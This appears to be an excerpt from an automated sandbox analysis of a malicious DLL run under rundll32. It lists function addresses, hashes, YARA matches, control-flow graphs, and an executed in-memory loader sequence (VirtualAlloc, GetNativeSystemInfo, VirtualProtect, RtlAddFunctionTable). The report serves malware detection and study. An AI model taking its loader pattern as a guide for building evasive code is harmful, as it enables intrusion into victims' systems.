                                                                                                                                Function 0000000180002D70 Relevance: 5.3, Strings: 4, Instructions: 266COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000003.00000002.240313727.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_3_2_180001000_rundll32.jbxd
                                                                                                                                Yara matches
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: #X$'Xsa$iJ6$vG
                                                                                                                                • API String ID: 0-746338152
                                                                                                                                • Opcode ID: 05ea12fd72043b3df7b90193803f13f9b9661e31632ee757fcd333ad07ef3f6f
                                                                                                                                • Instruction ID: 8ba50615c78112980223cca8f04f1fa67c4b69ee5a809e4e0bd2b8ae6832a1bb
                                                                                                                                • Opcode Fuzzy Hash: 05ea12fd72043b3df7b90193803f13f9b9661e31632ee757fcd333ad07ef3f6f
                                                                                                                                • Instruction Fuzzy Hash: 93E154B590070DDFCB88DF68D19A9DD7BB9BB49308F404029FC0E9A264D3B4E919CB56
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 00000001800097C0 Relevance: 5.3, Strings: 4, Instructions: 257COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000003.00000002.240313727.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_3_2_180001000_rundll32.jbxd
                                                                                                                                Yara matches
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: *i^$MIC$-Z$]2
                                                                                                                                • API String ID: 0-498664264
                                                                                                                                • Opcode ID: db11ef6343568e39e87295be28a4fb69218d9fc865c563580501f4fd78a225ea
                                                                                                                                • Instruction ID: 9792ecb135b2155067e966d5e38dbf4f409fde80c29e70d57d2078ebe1ce15c6
                                                                                                                                • Opcode Fuzzy Hash: db11ef6343568e39e87295be28a4fb69218d9fc865c563580501f4fd78a225ea
                                                                                                                                • Instruction Fuzzy Hash: 10E1C670109B888FDBF8DF64CC86BEB7BA5FB44346F10651DD84A8A290DBB46645CF41
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 0000000180010758 Relevance: 5.2, Strings: 4, Instructions: 222COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000003.00000002.240313727.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_3_2_180001000_rundll32.jbxd
                                                                                                                                Yara matches
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: B$EG$QsF$_
                                                                                                                                • API String ID: 0-784369960
                                                                                                                                • Opcode ID: 2411b4f18f6ae95c167793a9182b69dfaeb4b2ef39c1ac24af76ef798b153418
                                                                                                                                • Instruction ID: 62dbbc71664ee0946fffbba3b71afe09b12d9ffe0d1744d6deb9db65ff0cd9cc
                                                                                                                                • Opcode Fuzzy Hash: 2411b4f18f6ae95c167793a9182b69dfaeb4b2ef39c1ac24af76ef798b153418
                                                                                                                                • Instruction Fuzzy Hash: 3FB1387010468D8FDF88DF28C88A6DA3FA1FB68388F614219FC4A97250C778D694CBC5
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 0000000180020334 Relevance: 5.2, Strings: 4, Instructions: 190COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000003.00000002.240313727.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_3_2_180001000_rundll32.jbxd
                                                                                                                                Yara matches
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: -`G$.$5B.Y$Z`35
                                                                                                                                • API String ID: 0-1363032466
                                                                                                                                • Opcode ID: bf60aa8e83620137796280cd5bd0e9d08ed9dd04dd302297e234b85e3718d0fd
                                                                                                                                • Instruction ID: b244d414363a4385de25ad5610b22aaac7fb2f2c92cf8150697ad32e565f4bd8
                                                                                                                                • Opcode Fuzzy Hash: bf60aa8e83620137796280cd5bd0e9d08ed9dd04dd302297e234b85e3718d0fd
                                                                                                                                • Instruction Fuzzy Hash: 29A1FB716157888FEB7ADF24C89A7CE7BE1FB49308F40461DD98E8A250D7B49609CB42
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 000000018000EE98 Relevance: 5.2, Strings: 4, Instructions: 167COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000003.00000002.240313727.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_3_2_180001000_rundll32.jbxd
                                                                                                                                Yara matches
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: *+_$WSh$\O$#o
                                                                                                                                • API String ID: 0-1846314129
                                                                                                                                • Opcode ID: 2b55738af9202b4623c877c52658b874745984570bac3296ae94d1111b904a17
                                                                                                                                • Instruction ID: 175ce4bc0e22c7a636d32034be2bbb8ad42f6b3cb6a748f64f507b7f0b29ed37
                                                                                                                                • Opcode Fuzzy Hash: 2b55738af9202b4623c877c52658b874745984570bac3296ae94d1111b904a17
                                                                                                                                • Instruction Fuzzy Hash: 1971167160474ECFCB98DF18C489ADA3BE1FB58318F414529FC09A7264DB74DAA8CB85
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 0000000180024D80 Relevance: 5.2, Strings: 4, Instructions: 155COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000003.00000002.240313727.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_3_2_180001000_rundll32.jbxd
                                                                                                                                Yara matches
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: .B$O$M*K$\<
                                                                                                                                • API String ID: 0-3225238681
                                                                                                                                • Opcode ID: 97d1f14c936b4c6fd28126f9270f10017570076f2259e30e0790da2a5d8d89f7
                                                                                                                                • Instruction ID: 95d2fbb8f7fe970b1359d27f41ccd6aad584115d4fee043204e0c0f4c3f3b287
                                                                                                                                • Opcode Fuzzy Hash: 97d1f14c936b4c6fd28126f9270f10017570076f2259e30e0790da2a5d8d89f7
                                                                                                                                • Instruction Fuzzy Hash: 7181E370549788CFEBBACF24C886BDE7BE4FB48744F20461DE85A8A260DB709645CF41
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 000000018002A42C Relevance: 5.1, Strings: 4, Instructions: 143COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000003.00000002.240313727.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_3_2_180001000_rundll32.jbxd
                                                                                                                                Yara matches
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: $$$$xVO$~O
                                                                                                                                • API String ID: 0-3655128719
                                                                                                                                • Opcode ID: f0a1fe130e7a88269555c94ae3afa6992adf671055acde803b367a0cf8dc4998
                                                                                                                                • Instruction ID: 8f78542db34460f4381821bab2b7e4f68a699ed7f8b2fc47c959991f0b02677a
                                                                                                                                • Opcode Fuzzy Hash: f0a1fe130e7a88269555c94ae3afa6992adf671055acde803b367a0cf8dc4998
                                                                                                                                • Instruction Fuzzy Hash: 5B61D1B05187448FD369DF28C18965BBBF1FBC6744F008A1EF6868A260DB76D948CB47
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 00000001800024B8 Relevance: 5.1, Strings: 4, Instructions: 79COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000003.00000002.240313727.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_3_2_180001000_rundll32.jbxd
                                                                                                                                Yara matches
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: ,IW$G$JMg$l
                                                                                                                                • API String ID: 0-1370644289
                                                                                                                                • Opcode ID: aa199bcfabd2ca119bc867395ae2bb0b970833e8ef3f83c28db76f19b2a25dac
                                                                                                                                • Instruction ID: 7fb8b97fd43ed4dc52a467cdcf5cca41e6e56dbc92574a5c866222c6b731b82a
                                                                                                                                • Opcode Fuzzy Hash: aa199bcfabd2ca119bc867395ae2bb0b970833e8ef3f83c28db76f19b2a25dac
                                                                                                                                • Instruction Fuzzy Hash: 0A41D3B190074E8FCB48CF64C88A5DE7FB0FB18358F10461EE85AA6250D7B89695CFC9
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 0000000180018AB4 Relevance: 5.1, Strings: 4, Instructions: 119COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000003.00000002.240313727.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_3_2_180001000_rundll32.jbxd
                                                                                                                                Yara matches
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: ,$,$2S=$i`}G
                                                                                                                                • API String ID: 0-4285990414
                                                                                                                                • Opcode ID: 1704a5678c6fc7c63ed33a4399dbb19a0648d0f8b4dca33206a3e55e43de3fb6
                                                                                                                                • Instruction ID: 665cb0e6160ce90faac3fa7baf9a16caae401c848b442bb7533a8cc1fd62885f
                                                                                                                                • Opcode Fuzzy Hash: 1704a5678c6fc7c63ed33a4399dbb19a0648d0f8b4dca33206a3e55e43de3fb6
                                                                                                                                • Instruction Fuzzy Hash: 4D41E57051CB848FD7B4DF18D486BDABBE0FB98750F40495EE48DC3251DBB0A8858B86
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Execution Graph

                                                                                                                                Execution Coverage:10.7%
                                                                                                                                Dynamic/Decrypted Code Coverage:100%
                                                                                                                                Signature Coverage:0%
                                                                                                                                Total number of Nodes:11
                                                                                                                                Total number of Limit Nodes:0
                                                                                                                                execution_graph 3264 2be35a90000 3265 2be35a90183 3264->3265 3266 2be35a9043e VirtualAlloc 3265->3266 3270 2be35a90462 3266->3270 3267 2be35a90a7b 3268 2be35a90531 GetNativeSystemInfo 3268->3267 3269 2be35a9056d VirtualAlloc 3268->3269 3274 2be35a9058b 3269->3274 3270->3267 3270->3268 3271 2be35a90a00 3271->3267 3272 2be35a90a56 RtlAddFunctionTable 3271->3272 3272->3267 3273 2be35a909d9 VirtualProtect 3273->3274 3274->3271 3274->3273 3274->3274

                                                                                                                                Executed Functions

                                                                                                                                Function 000002BE35A90000 Relevance: 76.3, APIs: 5, Strings: 38, Instructions: 1094memoryCOMMON
                                                                                                                                Download Yara Rule

                                                                                                                                Control-flow Graph

                                                                                                                                • Executed
                                                                                                                                • Not Executed
                                                                                                                                control_flow_graph 0 2be35a90000-2be35a90460 call 2be35a90aa8 * 2 VirtualAlloc 22 2be35a9048a-2be35a90494 0->22 23 2be35a90462-2be35a90466 0->23 26 2be35a9049a-2be35a9049e 22->26 27 2be35a90a91-2be35a90aa6 22->27 24 2be35a90468-2be35a90488 23->24 24->22 24->24 26->27 28 2be35a904a4-2be35a904a8 26->28 28->27 29 2be35a904ae-2be35a904b2 28->29 29->27 30 2be35a904b8-2be35a904bf 29->30 30->27 31 2be35a904c5-2be35a904d2 30->31 31->27 32 2be35a904d8-2be35a904e1 31->32 32->27 33 2be35a904e7-2be35a904f4 32->33 33->27 34 2be35a904fa-2be35a90507 33->34 35 2be35a90509-2be35a90511 34->35 36 2be35a90531-2be35a90567 GetNativeSystemInfo 34->36 37 2be35a90513-2be35a90518 35->37 36->27 38 2be35a9056d-2be35a90589 VirtualAlloc 36->38 39 2be35a9051a-2be35a9051f 37->39 40 2be35a90521 37->40 41 2be35a9058b-2be35a9059e 38->41 42 2be35a905a0-2be35a905ac 38->42 43 2be35a90523-2be35a9052f 39->43 40->43 41->42 44 2be35a905af-2be35a905b2 42->44 43->36 43->37 46 2be35a905c1-2be35a905db 44->46 47 2be35a905b4-2be35a905bf 44->47 48 2be35a9061b-2be35a90622 46->48 49 2be35a905dd-2be35a905e2 46->49 47->44 50 2be35a90628-2be35a9062f 48->50 51 2be35a906db-2be35a906e2 48->51 52 2be35a905e4-2be35a905ea 49->52 50->51 53 2be35a90635-2be35a90642 50->53 54 2be35a906e8-2be35a906f9 51->54 55 2be35a90864-2be35a9086b 51->55 56 2be35a9060b-2be35a90619 52->56 57 2be35a905ec-2be35a90609 52->57 53->51 60 2be35a90648-2be35a9064f 53->60 61 2be35a90702-2be35a90705 54->61 58 2be35a90917-2be35a90929 55->58 59 2be35a90871-2be35a9087f 55->59 56->48 56->52 57->56 57->57 62 2be35a90a07-2be35a90a1a 58->62 63 2be35a9092f-2be35a90937 58->63 64 2be35a9090e-2be35a90911 59->64 65 2be35a90654-2be35a90658 60->65 66 2be35a90707-2be35a9070a 61->66 67 2be35a906fb-2be35a906ff 61->67 88 2be35a90a1c-2be35a90a27 62->88 89 2be35a90a40-2be35a90a4a 62->89 69 2be35a9093b-2be35a9093f 63->69 64->58 68 2be35a90884-2be35a908a9 64->68 70 2be35a906c0-2be35a906ca 65->70 71 2be35a90788-2be35a9078e 66->71 72 2be35a9070c-2be35a9071d 66->72 67->61 94 2be35a90907-2be35a9090c 68->94 95 2be35a908ab-2be35a908b1 68->95 75 2be35a909ec-2be35a909fa 69->75 76 2be35a90945-2be35a9095a 69->76 73 2be35a9065a-2be35a90669 70->73 74 2be35a906cc-2be35a906d2 70->74 78 2be35a90794-2be35a907a2 71->78 77 2be35a9071f-2be35a90720 72->77 72->78 84 2be35a9066b-2be35a90678 73->84 85 2be35a9067a-2be35a9067e 73->85 74->65 80 2be35a906d4-2be35a906d5 74->80 75->69 86 2be35a90a00-2be35a90a01 75->86 82 2be35a9097b-2be35a9097d 76->82 83 2be35a9095c-2be35a9095e 76->83 87 2be35a90722-2be35a90784 77->87 90 2be35a907a8 78->90 91 2be35a9085d-2be35a9085e 78->91 80->51 99 2be35a9097f-2be35a90981 82->99 100 2be35a909a2-2be35a909a4 82->100 96 2be35a9096e-2be35a90979 83->96 97 2be35a90960-2be35a9096c 83->97 98 2be35a906bd-2be35a906be 84->98 101 2be35a9068c-2be35a90690 85->101 102 2be35a90680-2be35a9068a 85->102 86->62 87->87 103 2be35a90786 87->103 104 2be35a90a38-2be35a90a3e 88->104 92 2be35a90a7b-2be35a90a8e 89->92 93 2be35a90a4c-2be35a90a54 89->93 105 2be35a907ae-2be35a907d4 90->105 91->55 92->27 93->92 107 2be35a90a56-2be35a90a79 RtlAddFunctionTable 93->107 94->64 116 2be35a908bb-2be35a908c8 95->116 117 2be35a908b3-2be35a908b9 95->117 108 2be35a909be-2be35a909bf 96->108 97->108 98->70 109 2be35a90989-2be35a9098b 99->109 110 2be35a90983-2be35a90987 99->110 114 2be35a909a6-2be35a909aa 100->114 115 2be35a909ac-2be35a909bb 100->115 112 2be35a90692-2be35a906a3 101->112 113 2be35a906a5-2be35a906a9 101->113 111 2be35a906b6-2be35a906ba 102->111 103->78 104->89 106 2be35a90a29-2be35a90a35 104->106 126 2be35a907d6-2be35a907d9 105->126 127 2be35a90835-2be35a90839 105->127 106->104 107->92 122 2be35a909c5-2be35a909cb 108->122 109->100 120 2be35a9098d-2be35a9098f 109->120 110->108 111->98 112->111 113->98 121 2be35a906ab-2be35a906b3 113->121 114->108 115->108 124 2be35a908ca-2be35a908d1 116->124 125 2be35a908d3-2be35a908e5 116->125 123 2be35a908ea-2be35a908fe 117->123 128 2be35a90999-2be35a909a0 120->128 129 2be35a90991-2be35a90997 120->129 121->111 130 2be35a909d9-2be35a909e9 VirtualProtect 122->130 131 2be35a909cd-2be35a909d3 122->131 123->94 142 2be35a90900-2be35a90905 123->142 124->124 124->125 125->123 133 2be35a907db-2be35a907e1 126->133 134 2be35a907e3-2be35a907f0 126->134 135 2be35a9083b 127->135 136 2be35a90844-2be35a90850 127->136 128->122 129->108 130->75 131->130 138 2be35a90812-2be35a9082c 133->138 139 2be35a907fb-2be35a9080d 134->139 140 2be35a907f2-2be35a907f9 134->140 135->136 136->105 141 2be35a90856-2be35a90857 136->141 138->127 144 2be35a9082e-2be35a90833 138->144 139->138 140->139 140->140 141->91 142->95 144->126
                                                                                                                                APIs
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000004.00000002.240810494.000002BE35A90000.00000040.00001000.00020000.00000000.sdmp, Offset: 000002BE35A90000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_4_2_2be35a90000_rundll32.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: Virtual$Alloc$FunctionInfoNativeProtectSystemTable
                                                                                                                                • String ID: Cach$Find$Flus$Free$GetN$Libr$Load$Load$Lock$Reso$Reso$Reso$Reso$RtlA$Size$Slee$Virt$Virt$aryA$ativ$ddFu$eSys$hIns$lloc$ncti$ofRe$onTa$rote$sour$temI$tion$truc$ualA$ualP$urce$urce$urce$urce
                                                                                                                                • API String ID: 394283112-2517549848
                                                                                                                                • Opcode ID: 590c178917582490f2a8474f3428d2fdec128c188f960b73743dba758a98ecc8
                                                                                                                                • Instruction ID: 3105cdbb31c38c2adac1c3561154c67ccaeee4d57ae7a4b1e9ff00b48bd49c7e
                                                                                                                                • Opcode Fuzzy Hash: 590c178917582490f2a8474f3428d2fdec128c188f960b73743dba758a98ecc8
                                                                                                                                • Instruction Fuzzy Hash: 1072D330618A4CCBDB69DF18C8897F9B7E1FB98304F11466EE88AC7252DB34D542DB85
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 000000018002C058 Relevance: 10.4, Strings: 8, Instructions: 370COMMON
                                                                                                                                Download Yara Rule

                                                                                                                                Control-flow Graph

                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000004.00000002.240697908.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_4_2_180001000_rundll32.jbxd
                                                                                                                                Yara matches
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: #C$(I$-:$Ekf$<W$Z$l$l
                                                                                                                                • API String ID: 0-464535774
                                                                                                                                • Opcode ID: d8792019bb8cd892c5e2cff0ba87425d7977148afb5a5f987cda1e45d5ff9126
                                                                                                                                • Instruction ID: edc4d0e98499d5b5adff65828f8d1fd2ac7ce79502a6533da94e18623254a36a
                                                                                                                                • Opcode Fuzzy Hash: d8792019bb8cd892c5e2cff0ba87425d7977148afb5a5f987cda1e45d5ff9126
                                                                                                                                • Instruction Fuzzy Hash: C102E3B151038CDBCB99DF28C8CAADD3BA1FB48398F956219FD0697260D774D884CB85
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 0000000180010FF4 Relevance: 7.9, Strings: 6, Instructions: 363COMMON
                                                                                                                                Download Yara Rule

                                                                                                                                Control-flow Graph

                                                                                                                                • Executed
                                                                                                                                • Not Executed
                                                                                                                                control_flow_graph 180 180010ff4-180011016 181 180011020 180->181 182 180011022-180011028 181->182 183 180011814 182->183 184 18001102e-180011034 182->184 185 180011819-18001181f 183->185 186 1800114e2-1800114ec 184->186 187 18001103a-180011040 184->187 185->182 188 180011825-180011832 185->188 191 1800114f5-18001151d 186->191 192 1800114ee-1800114f3 186->192 189 1800113e2-1800114d2 call 180008200 187->189 190 180011046-18001104c 187->190 189->188 199 1800114d8-1800114dd 189->199 190->185 194 180011052-18001120b call 180021040 call 1800291ac 190->194 195 180011523-1800117f4 call 180016314 call 1800291ac call 18001e2bc 191->195 192->195 207 180011212-1800113d7 call 1800291ac call 18001e2bc 194->207 208 18001120d 194->208 209 1800117f9-180011803 195->209 199->182 207->188 215 1800113dd 207->215 208->207 209->188 212 180011805-18001180f 209->212 212->182 215->181
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000004.00000002.240697908.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_4_2_180001000_rundll32.jbxd
                                                                                                                                Yara matches
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: )|x$/Zb$/v|$OV4T$\$lA
                                                                                                                                • API String ID: 0-3528011396
                                                                                                                                • Opcode ID: 74ea3d61a93069fa3a56a5f8f60d4b0c7eeb5b014d6ac06c6862fd203c8e6463
                                                                                                                                • Instruction ID: 5dbdb21e6b24644f90705741d0e2e2cc24c858ca1caac6c8284349b4f9dc1789
                                                                                                                                • Opcode Fuzzy Hash: 74ea3d61a93069fa3a56a5f8f60d4b0c7eeb5b014d6ac06c6862fd203c8e6463
                                                                                                                                • Instruction Fuzzy Hash: 8C2204705097C8CBDBBECF64C885BDA7BA8FB44B08F10521DEA4A9E258DB745744CB41
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 0000000180021618 Relevance: 7.8, Strings: 6, Instructions: 266COMMON
                                                                                                                                Download Yara Rule

                                                                                                                                Control-flow Graph

                                                                                                                                • Executed
                                                                                                                                • Not Executed
                                                                                                                                control_flow_graph 216 180021618-180021653 217 180021655-18002165a 216->217 218 180021bf3-180021c25 217->218 219 180021660-180021665 217->219 220 180021c2a-180021c2f 218->220 221 180021a81-180021bda call 180016314 219->221 222 18002166b-180021670 219->222 224 180021838-180021845 220->224 225 180021c35 220->225 228 180021bdf-180021bee 221->228 226 1800219f3-180021a7c call 180001b1c 222->226 227 180021676-18002167b 222->227 225->217 226->217 229 1800219e4-1800219ee 227->229 230 180021681-180021686 227->230 228->217 229->217 232 1800219d5-1800219df call 18001dfb4 230->232 233 18002168c-180021691 230->233 232->217 235 180021697-18002169c 233->235 236 18002190c-1800219a5 call 18000abac 233->236 239 1800216a2-1800216a7 235->239 240 180021846-180021907 call 180021434 235->240 243 1800219aa-1800219b0 236->243 239->220 244 1800216ad-180021835 call 180008200 call 1800166c0 239->244 240->217 246 1800219b2-1800219c6 243->246 247 1800219cb-1800219d0 243->247 244->224 246->217 247->217
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000004.00000002.240697908.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_4_2_180001000_rundll32.jbxd
                                                                                                                                Yara matches
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: $&.+$)O$.pN$F>9$t(/
                                                                                                                                • API String ID: 0-3036092626
                                                                                                                                • Opcode ID: 549a8b626face2190b4149bba4d09d4cb88f6d29378e8937dde350adb7fd5a83
                                                                                                                                • Instruction ID: e4baced68933c0a0796cf32b330105f1a6d3ed4de4784e8c7f389f9334031704
                                                                                                                                • Opcode Fuzzy Hash: 549a8b626face2190b4149bba4d09d4cb88f6d29378e8937dde350adb7fd5a83
                                                                                                                                • Instruction Fuzzy Hash: E6E109716093C89FEBBACF24C8897DE7BA1FB59344F50421DD88A8E250DB745B49CB42
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 000000018000C608 Relevance: 5.6, Strings: 4, Instructions: 616COMMON
                                                                                                                                Download Yara Rule

                                                                                                                                Control-flow Graph

                                                                                                                                • Executed
                                                                                                                                • Not Executed
                                                                                                                                control_flow_graph 252 18000c608-18000c62d 253 18000c632-18000c637 252->253 254 18000cc8a-18000cc8f 253->254 255 18000c63d 253->255 256 18000cc95-18000cc9a 254->256 257 18000cf2b-18000cfaf call 18001f7c0 call 18001c32c 254->257 258 18000c643-18000c648 255->258 259 18000cb7d-18000cc23 call 1800269b0 call 18001c32c 255->259 261 18000ce33-18000ced7 call 180008ad8 call 18001c32c 256->261 262 18000cca0-18000cca5 256->262 284 18000cfb4-18000d00a call 1800194a4 257->284 263 18000caa5-18000cb78 call 1800176b8 call 18001c32c call 1800194a4 258->263 264 18000c64e-18000c653 258->264 286 18000cc28-18000cc85 call 1800194a4 259->286 300 18000cedc-18000cf26 call 1800194a4 261->300 269 18000cd35-18000cdce call 18000703c call 18001c32c 262->269 270 18000ccab-18000ccb0 262->270 263->253 272 18000c9c1-18000ca52 call 18002870c call 18001c32c 264->272 273 18000c659-18000c65e 264->273 309 18000cdd3-18000ce2e call 1800194a4 269->309 279 18000ccb6-18000cd30 call 180021434 270->279 280 18000d00f-18000d014 270->280 311 18000ca57-18000caa0 call 1800194a4 272->311 282 18000c664-18000c669 273->282 283 18000c8bb-18000c963 call 180002610 call 18001c32c 273->283 279->253 280->253 288 18000d01a-18000d020 280->288 292 18000c7b2-18000c85a call 180019618 call 18001c32c 282->292 293 18000c66f-18000c674 282->293 316 18000c968-18000c9bc call 1800194a4 283->316 284->280 286->253 325 18000c85f-18000c8b6 call 1800194a4 292->325 293->280 303 18000c67a-18000c73d call 180002178 call 18001c32c 293->303 300->253 326 18000c742-18000c7ad call 1800194a4 303->326 309->253 311->253 316->253 325->253 326->253
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000004.00000002.240697908.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_4_2_180001000_rundll32.jbxd
                                                                                                                                Yara matches
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: +#;)$K'$sf$w\H
                                                                                                                                • API String ID: 0-1051058546
                                                                                                                                • Opcode ID: 6c53062de77b202a7a918e5f4038520a98252693d28bf41343123917f80ba32c
                                                                                                                                • Instruction ID: 30c6111824d62709d88844cae5ccd518ea343406d57bec7882368cdc1c6a6611
                                                                                                                                • Opcode Fuzzy Hash: 6c53062de77b202a7a918e5f4038520a98252693d28bf41343123917f80ba32c
                                                                                                                                • Instruction Fuzzy Hash: 8362F97050068D8FDB48DF28C89A6DD3FA1FB58388F524229FC4AA7251D778D999CBC4
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 000000018001E3AC Relevance: 4.0, Strings: 3, Instructions: 215COMMON
                                                                                                                                Download Yara Rule

                                                                                                                                Control-flow Graph

                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000004.00000002.240697908.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_4_2_180001000_rundll32.jbxd
                                                                                                                                Yara matches
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: <4P$<8$<w.
                                                                                                                                • API String ID: 0-1030867500
                                                                                                                                • Opcode ID: 6c4ff939f0d35883aefbb319d4430fd67387b4e339adb0f797cabce8c6a4bf31
                                                                                                                                • Instruction ID: 97d266913d6b0fd63d839b3c54903fd41a2ccd22a8a26fffcb9587bfe3b6431f
                                                                                                                                • Opcode Fuzzy Hash: 6c4ff939f0d35883aefbb319d4430fd67387b4e339adb0f797cabce8c6a4bf31
                                                                                                                                • Instruction Fuzzy Hash: C8B1E17151A384ABD788CF28C1C994BBBE1FBD4754F906A1DF8C68B260D7B0D948CB02
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 0000000180009100 Relevance: .1, Instructions: 125COMMON
                                                                                                                                Download Yara Rule

                                                                                                                                Control-flow Graph

                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000004.00000002.240697908.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_4_2_180001000_rundll32.jbxd
                                                                                                                                Yara matches
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 9400724a362ecc304d993d2fe4c896d101fab294f6d1cf34a07a96bc2a8ce181
                                                                                                                                • Instruction ID: 281782cf28aa09d34d334260f991d1b96cfbd8271b51b9b7c31761fd0664cb75
